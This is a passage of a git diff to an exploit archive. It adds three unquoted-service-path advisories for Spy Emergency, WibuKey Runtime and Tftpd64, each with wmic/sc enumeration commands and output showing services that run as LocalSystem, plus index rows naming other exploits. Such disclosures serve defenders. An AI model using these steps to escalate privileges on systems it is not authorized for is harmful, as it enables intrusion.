Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es +# Step to discover Unquoted Service Path: + +C:>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "SpyEmrg"| findstr /i /v """ +Spy Emergency Health Check SpyEmrgHealth C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe Auto +Spy Emergency Engine Service SpyEmrgSrv C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe Auto + +# Service info +C:>sc qc "SpyEmrgHealth" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: SpyEmrgHealth + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Spy Emergency Health Check + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +# Service info + +C:\>sc qc "SpyEmrgSrv" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: SpyEmrgSrv + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Spy Emergency Engine Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49999.txt b/exploits/windows/local/49999.txt new file mode 100644 index 000000000..e812eaf68 --- /dev/null +++ b/exploits/windows/local/49999.txt @@ -0,0 +1,32 @@ +# Exploit Title: WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 13-06-2021 +# Vendor Homepage: https://www.wibu.com +# Software Links: https://www.wibu.com/us/support/user/downloads-user-software/file/download/5792.html +# Tested Version: 6.51 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ +WIBU-KEY Server + WkSvW32.exe C:\PROGRAM FILES +(X86)\WIBUKEY\SERVER\WkSvW32.exe + Auto + +C:\Users\IEUser>sc qc WkSvW32.exe +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: WkSvW32.exe + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\PROGRAM FILES +(X86)\WIBUKEY\SERVER\WkSvW32.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : WIBU-KEY Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50004.txt b/exploits/windows/local/50004.txt new file mode 100644 index 000000000..5c1c6b258 --- /dev/null +++ b/exploits/windows/local/50004.txt @@ -0,0 +1,29 @@ +# Exploit Title: Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 14-06-2021 +# Vendor Homepage: https://bitbucket.org/phjounin/tftpd64/src/master/ +# Software Links: https://bitbucket.org/phjounin/tftpd64/wiki/Download%20Tftpd64.md +# Tested Version: 4.64 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ +Tftpd32 service edition Tftpd32_svc C:\Program +Files\Tftpd64_SE\tftpd64_svc.exe Auto + +C:\Users\IEUser>sc qc Tftpd32_svc +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Tftpd32_svc + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Tftpd64_SE\tftpd64_svc.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Tftpd32 service edition + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9660103c9..09daf1acb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6798,6 +6798,9 @@ id,file,description,date,author,type,platform,port 49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows, 49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios, 49979,exploits/ios/dos/49979.py,"n+otes 1.6.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios, +50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios, +50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios, +50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11358,6 +11361,9 @@ id,file,description,date,author,type,platform,port 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows, 49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows, 49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios, +49997,exploits/windows/local/49997.txt,"Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path",2021-06-14,"Erick Galindo",local,windows, +49999,exploits/windows/local/49999.txt,"WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows, +50004,exploits/windows/local/50004.txt,"Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44145,3 +44151,11 @@ id,file,description,date,author,type,platform,port 49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",2021-06-11,Luca.Chiou,webapps,multiple, 49988,exploits/php/webapps/49988.txt,"Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)",2021-06-11,"Avinash R",webapps,php, 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php, +49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple, +49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple, +49992,exploits/php/webapps/49992.py,"GLPI 9.4.5 - Remote Code Execution (RCE)",2021-06-14,"Brian Peters",webapps,php, +49993,exploits/php/webapps/49993.txt,"COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)",2021-06-14,"BHAVESH KAUL",webapps,php, +49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",2021-06-14,"Riadh Benlamine",webapps,php, +49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",2021-06-14,"BHAVESH KAUL",webapps,php, +49996,exploits/php/webapps/49996.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)",2021-06-14,"Mert Daş",webapps,php, +49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",2021-06-14,"Ron Jost",webapps,php,